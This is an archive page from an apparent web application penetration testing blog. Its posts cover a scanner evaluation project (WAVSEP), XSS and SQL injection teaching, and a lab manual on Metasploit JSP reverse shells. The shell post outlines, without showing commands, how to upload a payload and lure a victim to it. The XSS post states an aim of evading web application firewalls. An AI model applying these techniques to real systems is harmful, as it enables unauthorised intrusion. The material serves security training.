WAVSEP – Web Application Vulnerability Scanner Evaluation Project

Posted on September 19, 2011 by

I have to admit that I really think this is a good idea. Shay Chen (@sectooladdict) has put together a project to evaluate Web Application Vulnerability scanners. He calls it WAVSEP.

The project is currently being hosted on Google code.

Taken from the project description:

Project WAVSEP currently includes the following test cases:

Vulnerabilities:

  • Reflected XSS: 66 test cases, implemented in 64 jsp pages (GET & POST)
  • Error Based SQL Injection: 80 test cases, implemented in 76 jsp pages (GET & POST )
  • Blind SQL Injection: 46 test cases, implemented in 44 jsp pages (GET & POST )
  • Time Based SQL Injection: 10 test cases, implemented in 10 jsp pages (GET & POST )

False Positives:

  • 7 different categories of false positive Reflected XSS vulnerabilities (GET & POST )
  • 10 different categories of false positive SQL Injection vulnerabilities (GET & POST)

Additional Features:

  • A simple web interface for accessing the vulnerable pages
  • Sample detection & exploitation payloads for each and every test case
  • Database connection pool support, ensuring the consistency of scanning results

 

Also – on Shay’s blog he has posted a comparison of majority of Web Application Vulnerability Scanners (both Commercial & Open-Source).

An argument could be made that the project’s focus in terms of vulnerabilities is too narrow (not covering dom-based XSS as an example), and as much as I can see the argument I’m sure the argument is coming from people that are sitting on their ass not doing anything for the community like Shay is doing.

In my opinion – I think this is good for the community and I hope that the project gains some good momentum and really grows.

Good work Shay!

 

 

Posted in Cross Site Scripting, SQL Injection | Tagged , , , | Leave a comment

Cross Site Scripting – So what?

Posted on September 12, 2011 by

Ok – so I decided to put in a few things about Cross Site Scripting. I wanted to give you enough information to be able to both understand XSS, and more importantly do it against a modern application protected by a Web Application Firewall (WAF).

 

Let’s start with the absolute basics of XSS:

 

 

Ok – that’s the basics of XSS. Now let’s move on to some more technical info about it:

 

 

 

Posted in Cross Site Scripting | Tagged , , , | Leave a comment

Advaned SQL Injection Presentation

Posted on September 12, 2011 by

I did this talk a few years ago before I started Strategic Security. I love the subject of SQL Injection, I’ve spoken on it a lot and people often ask me for my slides. If you’d like my slides you can download them here.

 

Hope you enjoy the talk, and feel free to contact me if you have questions on SQL Injection.

 

 

 

 

 

Posted in SQL Injection | Tagged , , , , | Leave a comment

Metasploit JSP Shells

Posted on September 12, 2011 by

The Strategic Security rookies are hard at work. This is one of many blog posts that you’ll be seeing from them. I hope you enjoy it, and if you find technical errors in it please let me know so I can get them fixed immediately. If you are interested in becoming a rookie (intern) you can check out the Security Rookies website.

In this lab manual we will be working with the JSP bind and reverse shells.  The easiest way for us to use these, is to create a raw .jsp file and place it on our webserver.  Though, you are not limited to doing it this way.  Lets take a look at how to use them.

First, lets create our payload and move your exploit.jsp into the root of your webserver:

NOTE:

In a real web application penetration test you would have found a web page that allows you to upload a file and then browse to the file that you uploaded. We are simulating that step by running our own webserver and uploading the exploit.jsp file manually.

Finally, we need to start metasploit and setup our payload handler:

Once everything is setup have your victim navigate to your malicious webpage:

Posted in File Handling Vulnerabilities | Tagged , , | Leave a comment

Welcome to Web App Pentest

Posted on August 14, 2011 by

I really hope that people will enjoy and learn from this website. For me as a Network Penetration Tester for several years it was REALLY hard to transition to doing web application penetration tests. I really didn’t have a strong programming background, the web just didn’t seem as logical to me as network did.

In time I started to get a feel for it, and along the way I learned some tricks to make it simpler for me. I’ll be trying to share that as well as new stuff here on this website.

Let’s do this!!!

 

Posted in Uncategorized | Leave a comment